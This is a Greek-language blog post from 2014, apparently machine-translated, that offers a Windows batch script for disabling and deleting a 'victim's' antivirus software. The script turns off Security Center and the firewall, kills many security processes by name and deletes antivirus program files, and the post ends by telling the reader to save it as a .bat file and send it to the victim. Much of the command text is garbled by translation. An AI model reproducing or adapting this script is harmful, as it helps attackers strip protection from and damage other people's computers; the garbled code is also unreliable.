Κυριακή, 13 Ιουλίου 2014

Πώς να απενεργοποιήσετε / διαγράψετε Antivirus θύμα σας;
Εδώ εγώ σας δίνω το πρόγραμμα παρτίδα για να απενεργοποιήσετε ή να διαγράψετε το antivirus στα θύματα του υπολογιστή.     
@ Echo off rem - rem Permanently Kill Anti-Virus net stop "Security Center" function netsh firewall set opmode = off tskill / A av * tskill / A fire * tskill / A anti * cls tskill / A spy * tskill / A BullGuard tskill / A PersFw tskill / A KAV * tskill / A ZoneAlarm tskill / A SafeWeb cls tskill / A OUTPOST tskill / A nv * tskill / A nav * tskill / A F- * tskill / A eSafe tskill / A Article cls tskill / A BlackIce tskill / A def * tskill / A kav tskill / A kav * tskill / A avg * Tskill / A ash * cls tskill / A aswupdsv tskill / A ewid * tskill / A guard * tskill / A guar * tskill / A gcasDt * tskill / A MSMP * cls tskill / A mcafe * tskill / A mghtml tskill / A msiexec tskill / A outpost tskill / A Isafe tskill / A zapping * cls tskill / A zauinst tskill / A upd * tskill / A zlclien * tskill / A minilog tskill / A cc * tskill / A norton * cls tskill / A au norton * tskill / A ccc * tskill / A npfmn * tskill / A Ioav * tskill / A nisum * tskill / A issvc tskill / A tmp * cls tskill / A BIS * tskill / A SCPs * tskill / A cpd * tskill / A pop * tskill / A pav * tskill / A padmin cls tskill / A panda * tskill / A avsch * tskill / A sche * tskill / A syman * tskill / A virus * tskill / A sphere * cls tskill / A sweep * tskill / A scan * tskill / A ad- * tskill / A safe * tskill / A AVAS * tskill / A rule * cls tskill / A offg * Delete / Q / FC: \ Program Files \ alwils ~ 1 \ avast4 \ * *. Clear / Q / FC :. \ Program Files \ Lavasoft \ Ad-awa ~ 1 \ * exe deleted items / Q / FC :. \ Program Files \ kasper ~ 1 \ * exe cls Clear / Q / FC :. \ Program Files \ trojan ~ 1 \ * exe deleted items / Q / FC :. \ Program Files \ f-prot95 \ * dll deleted items / Q / FC :. \ Program Files \ tbav \ * dat cls Clear / Q / FC :. \ Program Files \ avpersonal \ * vdf deleted items / Q / FC :. \ Program Files \ Norton ~ 1 \ * cnt deleted items / Q / FC: \ Program Files \ Mcafee \ * *. cls Clear / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ Norton ~ 3 \ * *. Clear / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ speedd ~ 1 \ * *. Clear / Q / FC: \ Program Files \ Norton ~ 1 \ Norton ~ 1 \ * *. Clear / Q / FC: \ Program Files \ Norton ~ 1 \ * *. cls Clear / Q / FC :. \ Program Files \ avgamsr \ * exe deleted items / Q / FC :. \ Program Files \ avgamsvr \ * exe deleted items / Q / FC :. \ Program Files \ Avgemc \ * exe cls Clear / Q / FC :. \ Program Files \ avgcc \ * exe deleted items / Q / FC :. \ Program Files \ avgupsvc \ * exe deleted items / Q / FC: \ Program Files \ Grisoft deleted items / Q / FC :. \ Program Files \ nood32krn \ * exe deleted items / Q / FC :. \ Program Files \ nood32 \ * exe cls Clear / Q / FC: \ Program Files \ nod32 deleted items / Q / FC: \ Program Files \ nood32 deleted items / Q / FC :. \ Program Files \ kav \ * exe deleted items / Q / FC :. \ Program Files \ kavmm \ * exe deleted items / Q / FC: \ Program Files \ kaspersky \ * *. cls Clear / Q / FC :. \ Program Files \ ewidoctrl \ * exe deleted items / Q / FC :. \ Program Files \ Guard \ * exe deleted items / Q / FC :. \ Program Files \ Ewido \ * exe cls Clear / Q / FC :. \ Program Files \ pavprsrv \ * exe deleted items / Q / FC :. \ Program Files \ pavprot \ * exe deleted items / Q / FC :. \ Program Files \ avengine \ * exe cls Clear / Q / FC :. \ Program Files \ apvxdwin \ * exe deleted items / Q / FC :. \ Program Files \ WebProxy \ * exe deleted items / Q / FC: \ Program Files \ panda software \ *. rem - 
 Αντιγράψτε αυτόν τον κώδικα στο σημειωματάριο  Αποθηκεύστε το με επέκταση. Νυχτερίδα (π.χ. για antdis.bat)  στείλετε στο θύμα σας

1 σχόλιο: